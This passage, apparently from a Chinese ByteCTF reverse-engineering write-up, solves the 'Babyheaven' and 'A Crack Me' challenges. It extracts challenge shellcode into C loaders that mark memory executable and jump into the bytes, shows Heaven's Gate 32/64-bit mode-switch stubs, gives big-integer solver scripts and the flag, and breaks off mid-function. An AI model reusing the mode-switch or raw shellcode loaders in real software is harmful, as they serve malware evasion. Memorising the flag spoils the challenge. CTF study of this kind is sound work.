\x45\xcc\xc6\x0\x17\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x3b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x44\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x7c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xcf\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xeb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x90\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x3b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x44\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x7d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe9\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xde\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xfd\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xff\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xff\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x90\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xeb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x90\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x81\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x5f\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x5d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc3\x83\x45\xcc\x1\x8b\x45\xc8\x89\x45\xcc\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x81\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x90\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x6a\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x23\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x24\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xcb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8d\x85\x88\xfe\xff\xff\x89\x44\x24\xc\xc7\x44\x24\x8\x40\x0\x0\x0\x8b\x45\xd0\x89\x44\x24\x4\x8b\x45\xcc\x89\x4\x24\x8b\x45\xe0\xff\xd0\x83\xec\x10\xc7\x85\x68\xfe\xff\xff\x42\x79\x74\x65\xc7\x85\x6c\xfe\xff\xff\x43\x54\x46\x7b\xc7\x85\x70\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x74\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x78\xfe\xff\xff\x7d\x0\x0\x0\xc7\x85\x7c\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x80\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x84\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x60\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x64\xfe\xff\xff\x0\x0\x0\x0\x8d\x85\x60\xfe\xff\xff\x8d\x95\x68\xfe\xff\xff\x8d\x8d\x68\xfe\xff\xff\x83\xc1\x8\x8b\x5d\xd4\x6a\x0\xff\xb5\xbc\xfe\xff\xff\x6a\x0\x50\x52\x6a\x0\xff\xb5\xbc\xfe\xff\xff\x51\xff\xb5\xb4\xfe\xff\xff\x53\xff\xb5\x8c\xfe\xff\xff\xff\xb5\xb8\xfe\xff\xff\xc3";
typedef void (*FUNC_POINT)(void);
int main()
{
MessageBoxA(0, 0, 0, 0);
printf("hello world");
((FUNC_POINT)function)();
return 0;
}编译之后能直接进函数F5,可以看到大致流程
题目名称为Babyheaven,了解到了天堂之门 Heaven's Gate ,该题程序流程和地球人的看雪博客里面差不多。
主要分析的东西就在opcode里面,opcode有三个部分,分别是32切64,主要函数,64切32,先提opcode,然后和刚才一样编译一下,提取的时候中间指针直接+0x100 然后有一个回跳的步骤
#include <stdio.h>
#include <Windows.h>
unsigned char function[] = "\x55\x57\x48\x81\xec\xd8\x1\x0\x0\x48\x8d\xac\x24\x80\x0\x0\x0\x48\x89\x8d\x70\x1\x0\x0\x48\x8d\x55\x60\xb8\x0\x0\x0\x0\xb9\x1b\x0\x0\x0\x48\x89\xd7\xf3\x48\xab\x48\x89\xfa\x89\x2\x48\x83\xc2\x4\xc7\x45\x60\x5\x0\x0\x0\xc7\x45\x64\x12\x0\x0\x0\xc7\x45\x68\xe\x0\x0\x0\xc7\x45\x6c\x17\x0\x0\x0\xc7\x45\x70\x9\x0\x0\x0\xc7\x45\x74\xf\x0\x0\x0\xc7\x45\x78\x4\x0\x0\x0\xc7\x45\x7c\x15\x0\x0\x0\xc7\x85\x80\x0\x0\x0\xa\x0\x0\x0\xc7\x85\x84\x0\x0\x0\x14\x0\x0\x0\xc7\x85\x88\x0\x0\x0\x13\x0\x0\x0\xc7\x85\x8c\x0\x0\x0\x19\x0\x0\x0\xc7\x85\x90\x0\x0\x0\x18\x0\x0\x0\xc7\x85\x94\x0\x0\x0\x16\x0\x0\x0\xc7\x85\x98\x0\x0\x0\xc\x0\x0\x0\xc7\x85\x9c\x0\x0\x0\x10\x0\x0\x0\xc7\x85\xa0\x0\x0\x0\x2\x0\x0\x0\xc7\x85\xa4\x0\x0\x0\x11\x0\x0\x0\xc7\x85\xa8\x0\x0\x0\x7\x0\x0\x0\xc7\x85\xac\x0\x0\x0\x1\x0\x0\x0\xc7\x85\xb0\x0\x0\x0\x8\x0\x0\x0\xc7\x85\xb4\x0\x0\x0\xb\x0\x0\x0\xc7\x85\xb8\x0\x0\x0\x6\x0\x0\x0\xc7\x85\xbc\x0\x0\x0\xd\x0\x0\x0\xc7\x85\xc0\x0\x0\x0\x3\x0\x0\x0\x48\x8d\x55\x80\xb8\x0\x0\x0\x0\xb9\x1b\x0\x0\x0\x48\x89\xd7\xf3\x48\xab\x48\x89\xfa\x89\x2\x48\x83\xc2\x4\xc7\x45\x80\x5\x0\x0\x0\xc7\x45\x84\x12\x0\x0\x0\xc7\x45\x88\xe\x0\x0\x0\xc7\x45\x8c\x17\x0\x0\x0\xc7\x45\x90\xb\x0\x0\x0\xc7\x45\x94\x11\x0\x0\x0\xc7\x45\x98\xc\x0\x0\x0\xc7\x45\x9c\x4\x0\x0\x0\xc7\x45\xa0\x19\x0\x0\x0\xc7\x45\xa4\x18\x0\x0\x0\xc7\x45\xa8\x1\x0\x0\x0\xc7\x45\xac\x14\x0\x0\x0\xc7\x45\xb0\x13\x0\x0\x0\xc7\x45\xb4\xf\x0\x0\x0\xc7\x45\xb8\xd\x0\x0\x0\xc7\x45\xbc\xa\x0\x0\x0\xc7\x45\xc0\x6\x0\x0\x0\xc7\x45\xc4\x15\x0\x0\x0\xc7\x45\xc8\x7\x0\x0\x0\xc7\x45\xcc\x16\x0\x0\x0\xc7\x45\xd0\x8\x0\x0\x0\xc7\x45\xd4\x3\x0\x0\x0\xc7\x45\xd8\x9\x0\x0\x0\xc7\x45\xdc\x2\x0\x0\x0\xc7\x45\xe0\x10\x0\x0\x0\xc7\x85\x44\x1\x0\x0\x19\x0\x0\x0\x48\x8b\x85\x70\x1\x0\x0\x48\xc7\x0\x0\x0\x0\x0\x48\x8b\x85\x70\x1\x0\x0\x48\x8b\x0\x48\x8d\x50\x1\x48\x8b\x85\x70\x1\x0\x0\x48\x89\x10\x8b\x85\x44\x1\x0\x0\x83\xe8\x1\x89\x85\x4c\x1\x0\x0\xeb\x26\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x48\x98\x8b\x44\x85\x60\x39\xc2\x7f\x12\x83\xad\x4c\x1\x0\x0\x1\x83\xbd\x4c\x1\x0\x0\x0\x7f\xd1\xeb\x1\x90\x83\xbd\x4c\x1\x0\x0\x0\xf\x8e\xba\x1\x0\x0\x8b\x85\x44\x1\x0\x0\x83\xe8\x1\x89\x85\x48\x1\x0\x0\xeb\x26\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x48\x98\x8b\x44\x85\x60\x39\xc2\x7f\x17\x83\xad\x48\x1\x0\x0\x1\x8b\x85\x48\x1\x0\x0\x3b\x85\x4c\x1\x0\x0\x7d\xcc\xeb\x1\x90\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x48\x98\x8b\x4c\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x31\xd1\x48\x63\xd0\x89\x4c\x95\x60\x48\x98\x8b\x54\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x44\x85\x60\x31\xc2\x8b\x85\x48\x1\x0\x0\x48\x98\x89\x54\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x4c\x85\x60\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x31\xca\x48\x98\x89\x54\x85\x60\x8b\x85\x44\x1\x0\x0\x83\xe8\x1\x89\x85\x48\x1\x0\x0\xe9\x80\x0\x0\x0\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x44\x85\x60\x31\xc2\x8b\x85\x4c\x1\x0\x0\x48\x98\x89\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x44\x85\x60\x31\xc2\x8b\x85\x48\x1\x0\x0\x48\x98\x89\x54\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x44\x85\x60\x31\xc2\x8b\x85\x4c\x1\x0\x0\x48\x98\x89\x54\x85\x60\x83\x85\x4c\x1\x0\x0\x1\x83\xad\x48\x1\x0\x0\x1\x8b\x85\x4c\x1\x0\x0\x3b\x85\x48\x1\x0\x0\xf\x8c\x6e\xff\xff\xff\xc7\x85\x4c\x1\x0\x0\x0\x0\x0\x0\xeb\x23\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x44\x85\x80\x39\xc2\x75\x17\x83\x85\x4c\x1\x0\x0\x1\x8b\x85\x4c\x1\x0\x0\x3b\x85\x44\x1\x0\x0\x7c\xcf\xeb\x1\x90\x8b\x85\x4c\x1\x0\x0\x3b\x85\x44\x1\x0\x0\x7d\x8\xe9\xde\xfd\xff\xff\x90\xeb\x1\x90\x48\x81\xc4\xd8\x1\x0\x0\x5f\x5d\xc3";
typedef void (*FUNC_POINT)(void);
int main()
{
DWORD old;
VirtualProtect(&function, 0x1000, PAGE_EXECUTE_READWRITE, &old);
MessageBoxA(0, 0, 0, 0);
printf("hello world");
((FUNC_POINT)function)();
return 0;
}// 32 切 64
push 33h ; '3'
call $+5
add [esp+10h+var_10], 5
retf
// 64 切 32
push 23h ; '#'
call $+5
add qword ptr [esp], 7
retfq函数里面实现了一个排序功能(倒序),但是复杂是o(n!),执行次数对__int64取模就是大括号中间的值。
通过尝试发现如果是一个n阶的正序序列,经过次算法得到倒序序列,刚好需要n!步,而此题需要的是从一个序列状态到另一个序列状态的步骤数。
设求解的是从状态A到状态B,那么N(A-B) = N(A-0) - N(B-0) 0表示的是完全倒序状态。由此问题变为了求解某个状态到0状态的步骤数。
上述问题又可以拆分为以下子问题:假设当前一个n阶序列,第一个元素随机,后n-1个元素已经倒序,求当前状态到n个元素倒序的状态需要的步数。要是对原本的程序不做修改,只是输出当前序列的状态的话,可以发现此时的第一个元素是逐渐变大,由此可以连蒙带猜得出子问题的结论 N(步数) = (n-1)! * N(后n-1个元素中,大于第一个元素的个数)
然后就倒腾一下脚本就出来了。
因为子问题的步骤数爆__int64,所以随便找了份高精度。
#include<stdio.h>
#include<string.h>
#include<algorithm>
#include<iostream>
#define MAXN 1000
using namespace std;
struct HP
{
int len,s[MAXN];
HP()
{
memset(s,0,sizeof(s));
len=1;
}
HP operator =(const char *num) //字符串赋值
{
len=strlen(num);
for(int i=0;i<len;i++) s[i]=num[len-i-1]-'0';
}
HP operator =(int num) //int 赋值
{
char s[MAXN];
sprintf(s,"%d",num);
*this=s;
return *this;
}
HP(int num) { *this=num;}
HP(const char*num) {*this=num;}
string str()const //转化成string
{
string res="";
for(int i=0;i<len;i++) res=(char)(s[i]+'0')+res;
if(res=="") res="0";
return res;
}
HP operator +(const HP& b) const
{
HP c;
c.len=0;
for(int i=0,g=0;g||i<max(len,b.len);i++)
{
int x=g;
if(i<len) x+=s[i];
if(i<b.len) x+=b.s[i];
c.s[c.len++]=x%10;
g=x/10;
}
return c;
}
void clean()
{
while(len > 1 && !s[len-1]) len--;
}
HP operator *(const HP& b)
{
HP c;
c.len=len+b.len;
for(int i=0;i<len;i++)
for(int j=0;j<b.len;j++)
c.s[i+j]+=s[i]*b.s[j];
for(int i=0;i<c.len-1;i++)
{
c.s[i+1]+=c.s[i]/10;
c.s[i]%=10;
}
c.clean();
return c;
}
HP operator - (const HP& b)
{
HP c;
c.len = 0;
for(int i=0,g=0;i<len;i++)
{
int x=s[i]-g;
if(i<b.len) x-=b.s[i];
if(x>=0)
g=0;
else
{
g=1;
x+=10;
}
c.s[c.len++]=x;
}
c.clean();
return c;
}
HP operator / (const HP &b)
{
HP c, f = 0;
for(int i = len-1; i >= 0; i--)
{
f = f*10;
f.s[0] = s[i];
while(f>=b)
{
f =f-b;
c.s[i]++;
}
}
c.len = len;
c.clean();
return c;
}
HP operator % (const HP &b)
{
HP r = *this / b;
r = *this - r*b;
return r;
}
HP operator /= (const HP &b)
{
*this = *this / b;
return *this;
}
HP operator %= (const HP &b)
{
*this = *this % b;
return *this;
}
bool operator < (const HP& b) const
{
if(len != b.len) return len < b.len;
for(int i = len-1; i >= 0; i--)
if(s[i] != b.s[i]) return s[i] < b.s[i];
return false;
}
bool operator > (const HP& b) const
{
return b < *this;
}
bool operator <= (const HP& b)
{
return !(b < *this);
}
bool operator == (const HP& b)
{
return !(b < *this) && !(*this < b);
}
bool operator != (const HP &b)
{
return !(*this == b);
}
HP operator += (const HP& b)
{
*this = *this + b;
return *this;
}
bool operator >= (const HP &b)
{
return *this > b || *this == b;
}
};
istream& operator >>(istream &in, HP& x)
{
string s;
in >> s;
x = s.c_str();
return in;
}
ostream& operator <<(ostream &out, const HP& x)
{
out << x.str();
return out;
}
int v4[25] = {0};
int v5 = 25,i,j;
HP tot = 0;
HP jc(int n)
{
HP res = 1;
HP N = n,i = 1,n1 = 1;
for(;i<=N;i += n1)
{
res = res * i;
}
return res;
}
bool cmp(int a,int b)
{
return a>b;
}
int main()
{
v4[0] = 5;
v4[1] = 18;
v4[2] = 14;
v4[3] = 23;
v4[4] = 9;
v4[5] = 15;
v4[6] = 4;
v4[7] = 21;
v4[8] = 10;
v4[9] = 20;
v4[10] = 19;
v4[11] = 25;
v4[12] = 24;
v4[13] = 22;
v4[14] = 12;
v4[15] = 16;
v4[16] = 2;
v4[17] = 17;
v4[18] = 7;
v4[19] = 1;
v4[20] = 8;
v4[21] = 11;
v4[22] = 6;
v4[23] = 13;
v4[24] = 3;
while(1)
{
for ( i = v5 - 1; i > 0; --i )
if ( v4[i] > v4[i - 1] ) // 倒着找 找第一个大于前一位的 满足单调不升
break;
if ( i <= 0 ) // 如果单调上升则跳出循环
break;
if(i == v5-1 )
{
tot += 1LL;
sort(v4+i-1,v4+v5,cmp);
continue;
}
for ( j = v5 - 1; j >= i && v4[j] <= v4[i - 1]; --j ); // 倒着找 找到后面 第一个大于它的
// i-1 j
int now_n = v5 - i;
int k = j - i + 1;
HP K = k;
tot += jc(now_n) * K; // llllllllllllllllllllllllllllllllllll
sort(v4+i-1,v4+v5,cmp);
printf("%d %d \n",i,j);
}
cout << tot << endl;
return 0;
}#include<stdio.h>
#include<string.h>
#include<algorithm>
#include<iostream>
#define MAXN 1000
using namespace std;
struct HP
{
int len,s[MAXN];
HP()
{
memset(s,0,sizeof(s));
len=1;
}
HP operator =(const char *num) //字符串赋值
{
len=strlen(num);
for(int i=0;i<len;i++) s[i]=num[len-i-1]-'0';
}
HP operator =(int num) //int 赋值
{
char s[MAXN];
sprintf(s,"%d",num);
*this=s;
return *this;
}
HP(int num) { *this=num;}
HP(const char*num) {*this=num;}
string str()const //转化成string
{
string res="";
for(int i=0;i<len;i++) res=(char)(s[i]+'0')+res;
if(res=="") res="0";
return res;
}
HP operator +(const HP& b) const
{
HP c;
c.len=0;
for(int i=0,g=0;g||i<max(len,b.len);i++)
{
int x=g;
if(i<len) x+=s[i];
if(i<b.len) x+=b.s[i];
c.s[c.len++]=x%10;
g=x/10;
}
return c;
}
void clean()
{
while(len > 1 && !s[len-1]) len--;
}
HP operator *(const HP& b)
{
HP c;
c.len=len+b.len;
for(int i=0;i<len;i++)
for(int j=0;j<b.len;j++)
c.s[i+j]+=s[i]*b.s[j];
for(int i=0;i<c.len-1;i++)
{
c.s[i+1]+=c.s[i]/10;
c.s[i]%=10;
}
c.clean();
return c;
}
HP operator - (const HP& b)
{
HP c;
c.len = 0;
for(int i=0,g=0;i<len;i++)
{
int x=s[i]-g;
if(i<b.len) x-=b.s[i];
if(x>=0)
g=0;
else
{
g=1;
x+=10;
}
c.s[c.len++]=x;
}
c.clean();
return c;
}
HP operator / (const HP &b)
{
HP c, f = 0;
for(int i = len-1; i >= 0; i--)
{
f = f*10;
f.s[0] = s[i];
while(f>=b)
{
f =f-b;
c.s[i]++;
}
}
c.len = len;
c.clean();
return c;
}
HP operator % (const HP &b)
{
HP r = *this / b;
r = *this - r*b;
return r;
}
HP operator /= (const HP &b)
{
*this = *this / b;
return *this;
}
HP operator %= (const HP &b)
{
*this = *this % b;
return *this;
}
bool operator < (const HP& b) const
{
if(len != b.len) return len < b.len;
for(int i = len-1; i >= 0; i--)
if(s[i] != b.s[i]) return s[i] < b.s[i];
return false;
}
bool operator > (const HP& b) const
{
return b < *this;
}
bool operator <= (const HP& b)
{
return !(b < *this);
}
bool operator == (const HP& b)
{
return !(b < *this) && !(*this < b);
}
bool operator != (const HP &b)
{
return !(*this == b);
}
HP operator += (const HP& b)
{
*this = *this + b;
return *this;
}
bool operator >= (const HP &b)
{
return *this > b || *this == b;
}
};
istream& operator >>(istream &in, HP& x)
{
string s;
in >> s;
x = s.c_str();
return in;
}
ostream& operator <<(ostream &out, const HP& x)
{
out << x.str();
return out;
}
int v3[25] = {0};
int v5 = 25,i,j;
HP tot = 0;
HP jc(int n)
{
HP res = 1;
HP N = n,i = 1,n1 = 1;
for(;i<=N;i += n1)
{
res = res * i;
}
return res;
}
bool cmp(int a,int b)
{
return a>b;
}
int main()
{
v3[0] = 5;
v3[1] = 18;
v3[2] = 14;
v3[3] = 23;
v3[4] = 11;
v3[5] = 17;
v3[6] = 12;
v3[7] = 4;
v3[8] = 25;
v3[9] = 24;
v3[10] = 1;
v3[11] = 20;
v3[12] = 19;
v3[13] = 15;
v3[14] = 13;
v3[15] = 10;
v3[16] = 6;
v3[17] = 21;
v3[18] = 7;
v3[19] = 22;
v3[20] = 8;
v3[21] = 3;
v3[22] = 9;
v3[23] = 2;
v3[24] = 16;
while(1)
{
for ( i = v5 - 1; i > 0; --i )
if ( v3[i] > v3[i - 1] ) // 倒着找 找第一个大于前一位的 满足单调不升
break;
if ( i <= 0 ) // 如果单调上升则跳出循环
break;
if(i == v5-1 )
{
tot += 1LL;
sort(v3+i-1,v3+v5,cmp);
continue;
}
for ( j = v5 - 1; j >= i && v3[j] <= v3[i - 1]; --j ); // 倒着找 找到后面 第一个大于它的
// i-1 j
int now_n = v5 - i;
int k = j - i + 1;
HP K = k;
tot += jc(now_n) * K; // llllllllllllllllllllllllllllllllllll
sort(v3+i-1,v3+v5,cmp);
printf("%d %d \n",i,j);
}
cout << tot << endl;
return 0;
}两个输出求差的绝对值再转字符串就行,最后是大小端的问题需要把字符串倒序。
ByteCTF{Qw021zbG}
A Crack Me
动静结合理一下正向代码,并带入检验且检验成功,可以把原程序丢掉了
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
unsigned char box[24 * 9] =
{
0x33, 0x37, 0x64, 0x35, 0x39, 0x66, 0x37, 0x61, 0x32, 0x66,
0x37, 0x64, 0x63, 0x34, 0x30, 0x63, 0x61, 0x30, 0x34, 0x61,
0x37, 0x62, 0x30, 0x73, 0x5F, 0x5F, 0xA9, 0x21, 0xFA, 0xED,
0xF1, 0x36, 0xA6, 0xCD, 0xD9, 0x87, 0x9D, 0x5A, 0x90, 0xD5,
0x0F, 0x71, 0x67, 0x0E, 0x37, 0xFF, 0xA1, 0x78, 0x58, 0x05,
0xFD, 0x07, 0x3A, 0xD8, 0x47, 0xBC, 0xD0, 0x04, 0x3E, 0x33,
0x08, 0x3E, 0xDD, 0x21, 0xB1, 0x71, 0xEB, 0x13, 0x53, 0x5E,
0x58, 0x05, 0x12, 0x23, 0x77, 0x00, 0x30, 0xCC, 0xA4, 0x2E,
0x66, 0x4B, 0xD0, 0x56, 0xC7, 0x7D, 0xE9, 0x44, 0x17, 0x76,
0x47, 0x8A, 0x18, 0x02, 0xD2, 0x26, 0x75, 0xCF, 0x1F, 0xB3,
0x5E, 0xD7, 0x28, 0x6A, 0x04, 0x7A, 0xEB, 0x61, 0x1F, 0x9F,
0x61, 0x9C, 0xA8, 0x25, 0x3C, 0x43, 0x6F, 0xCF, 0xD5, 0xAF,
0xB0, 0x92, 0xDC, 0xD3, 0x61, 0xE7, 0xA4, 0xAA, 0xC2, 0xC2,
0x3C, 0x57, 0xDD, 0x1A, 0xB3, 0x0B, 0x83, 0x55, 0x16, 0x88,
0x0D, 0xDD, 0x6E, 0x3D, 0x8F, 0x59, 0x49, 0xCD, 0x2C, 0x8D,
0x6E, 0x10, 0x6E, 0x53, 0xE5, 0xDA, 0xE2, 0x64, 0x68, 0xE8,
0x19, 0xA9, 0x60, 0x9C, 0xB5, 0xF2, 0x03, 0xFF, 0xC2, 0xB2,
0xCC, 0xF1, 0xB3, 0x9C, 0x4E, 0xA1, 0x77, 0xF0, 0xBA, 0x99,
0x36, 0xC0, 0x42, 0x71, 0xFC, 0x90, 0xBF, 0x72, 0x17, 0xD5,
0xCD, 0xDF, 0x73, 0xEA, 0x1C, 0xCC, 0x40, 0x9E, 0xCB, 0xAC,
0x4A, 0x82, 0x84, 0x35, 0x85, 0x97, 0xBE, 0xEA, 0x2E, 0x3A,
0x83, 0xEA, 0xC5, 0xF2, 0xC5, 0xE0};
unsigned char byte_7FF76BB333A0[] =
{
0x00, 0x36, 0x30, 0x0D, 0x0F, 0x12, 0x35, 0x23, 0x19, 0x3F,
0x2D, 0x34, 0x03, 0x14, 0x29, 0x21, 0x3B, 0x24, 0x02, 0x22,
0x0A, 0x08, 0x39, 0x25, 0x3C, 0x13, 0x2A, 0x0E, 0x32, 0x1A,
0x3A, 0x18, 0x27, 0x1B, 0x15, 0x11, 0x10, 0x1D, 0x01, 0x3E,
0x2F, 0x28, 0x33, 0x38, 0x07, 0x2B, 0x2C, 0x26, 0x1F, 0x0B,
0x04, 0x1C, 0x3D, 0x2E, 0x05, 0x31, 0x09, 0x06, 0x17, 0x20,
0x1E, 0x0C, 0x37, 0x16};
void sub_7FF76BB31064(char *a1)
{
int i; // er10
unsigned char v3; // r11
int v4; // edi
int v5; // er8
int j; // ebx
int v7; // eax
char v8; // dl
char v9; // cl
int v10; // ebx
unsigned char v11; // si
int v12; // eax
char v13; // r11
char v14; // cl
unsigned char *result; // rax
long long v16; // xmm1_8
unsigned char v17[24] = {0};
for (i = 0; i < 32; ++i)
{
v3 = 0;
v4 = 6 * i;
v5 = 0;
for (j = 5; j > -1; --j)
{
v7 = v4 + v5;
v8 = (v4 + v5) & 7;
if (v4 + v5 < 0)
{
v7 += 7;
v8 -= 8;
}
++v5;
v9 = j;
v3 ^= ((a1[v7 >> 3] >> (7 - v8)) & 1) << v9;
}
v10 = 0;
v11 = byte_7FF76BB333A0[v3];
do
{
v12 = v4 + v10;
v13 = (v4 + v10) & 7;
if (v4 + v10 < 0)
{
v12 += 7;
v13 -= 8;
}
v14 = 5 - v10++;
v17[v12 >> 3] ^= ((v11 >> v14) & 1) << (7 - v13);
} while (v10 < 6); // 5个式子
}
memcpy(a1, v17, 24);
}
void sub_7FF76BB311B8(char *a1)
{
int i; // er8
int v3; // er10
int v4; // ebx
long long v5; // rdi
int v6; // eax
char v7; // r11
int v8; // ecx
int v9; // edx
unsigned char *result; // rax
long long v11; // xmm1_8
unsigned char v12[24] = {0};
for (i = 0; i < 192; i += 6)
{
v3 = i;
v4 = i;
v5 = 6;
do
{
v6 = v3;
v7 = v3 & 7;
if (v3 < 0)
{
v6 = v3 + 7;
v7 -= 8;
}
v8 = v4 % 192;
v9 = (v4 % 192) & 7;
if (v4 % 192 < 0)
{
v8 += 7;
v9 -= 8;
}
++v3;
v4 += 7;
v12[v6 >> 3] ^= ((a1[v8 >> 3] >> (7 - v9)) & 1) << (7 - v7);
--v5;
} while (v5);
}
memcpy(a1, v12, 24);
}
void print_input(char *input)
{
for (int i = 0; i < 24; ++i)
{
printf("%d,", (unsigned char)input[i]);
}
}
int main()
{
char input[] = "123456789012345678901234";
unsigned char sb[] = {0x11, 0xA1, 0x33, 0x03, 0x1B, 0xAB, 0x3B, 0xA3, 0x83, 0xB3, 0xA9, 0xA3, 0x81, 0xBB, 0x39, 0x13, 0x03, 0x3B, 0x19, 0x0B, 0x2D, 0x99, 0x21, 0x91};
sub_7FF76BB31064(input);
sub_7FF76BB311B8(input);
sub_7FF76BB31064(input);
for (int i = 0; i < 24; ++i)
{
input[i] ^= box[i];
}
for (int i = 0; i < 8; ++i)
{
sub_7FF76BB31064(input);
sub_7FF76BB311B8(input);
sub_7FF76BB31064(input);
sub_7FF76BB311B8(input);
int v33[] = {0, 1, 5, 9, 0xF, 0x15, 0x1A};
char v38[24] = {0};
for (int k = 0; k < 32; ++k)
{
